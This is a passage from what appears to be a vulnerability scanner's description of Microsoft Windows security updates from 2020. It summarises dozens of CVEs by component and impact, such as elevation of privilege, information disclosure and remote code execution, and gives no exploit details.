attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1368)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network List Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1406)\n\n - An information disclosure vulnerability exists when the Windows Graphics component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Graphics Component handles objects in memory. (CVE-2020-1351)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1468)\n\n - An elevation of privilege vulnerability exists when the Windows Event Logging Service improperly handles memory.\n (CVE-2020-1365, CVE-2020-1371)\n\n - An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1389, CVE-2020-1419)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Speech Brokered API handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1395)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1344, CVE-2020-1362, CVE-2020-1369)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. (CVE-2020-1402)\n\n - This security update corrects a denial of service in the Local Security Authority Subsystem Service (LSASS) caused when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause a denial of service on the target system's LSASS service, which triggers an automatic reboot of the system. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1267)\n\n - A remote code execution vulnerability exists when Windows Address Book (WAB) improperly processes vcard files. (CVE-2020-1410)\n\n - An elevation of privilege vulnerability exists when the Windows Modules Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1346)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1354, CVE-2020-1430)\n\n - An elevation of privilege vulnerability exists in the way that the SharedStream Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1463)\n\n - An elevation of privilege vulnerability exists when Group Policy Services Policy Processing improperly handle reparse points. An attacker who successfully exploited this vulnerability could overwrite a targeted file that would normally require elevated permissions.\n (CVE-2020-1333)\n\n - An information disclosure vulnerability exists when Skype for Business is accessed via Microsoft Edge (EdgeHTML-based). An attacker who exploited the vulnerability could cause the user to place a call without additional consent, leading to information disclosure of the user profile. For the vulnerability to be exploited, a user must click a specially crafted URL that prompts the Skype app. (CVE-2020-1462)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1408)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1336)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1396)\n\n - A denial of service vulnerability exists in the way that the WalletService handles files. An attacker who successfully exploited the vulnerability could corrupt system files. (CVE-2020-1364)\n\n - An information disclosure vulnerability exists when Skype for Business is accessed via Internet Explorer. An attacker who exploited the vulnerability could cause the user to place a call without additional consent, leading to information disclosure of the user profile. For the vulnerability to be exploited, a user must click a specially crafted URL that prompts the Skype app.\n (CVE-2020-1432)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Location Awareness Service handles objects in memory. An attacker who successfully exploited the vulnerability could allow an application with limited privileges on an affected system to execute code at a medium integrity level. (CVE-2020-1437)\n\n - A remote code execution vulnerability exists in .NET Framework, Microsoft SharePoint, and Visual Studio when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. (CVE-2020-1147)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1373, CVE-2020-1390, CVE-2020-1427, CVE-2020-1428, CVE-2020-1438)\n\n - An elevation of privilege vulnerability exists when the Windows Cryptography Next Generation (CNG) Key Isolation service improperly handles memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1359, CVE-2020-1384)\n\n - An information disclosure vulnerability exists when the Windows Resource Policy component improperly handles memory. (CVE-2020-1358)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Function Discovery Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1085)\n\n - An information disclosure vulnerability exists when Windows Error Reporting improperly handles file operations. (CVE-2020-1420)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1412)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1249, CVE-2020-1353, CVE-2020-1370, CVE-2020-1399, CVE-2020-1404, CVE-2020-1413)\n\n - An information disclosure vulnerability exists when Microsoft Edge PDF Reader improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1433)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1400, CVE-2020-1401, CVE-2020-1407)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file leading to an elevated status. (CVE-2020-1429)\n\n - An elevation of privilege vulnerability exists in the way that the psmsrv.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1388)\n\n - An elevation of privilege vulnerability exists when the Windows iSCSI Target Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1356)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1421)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-1397)\n\n - A re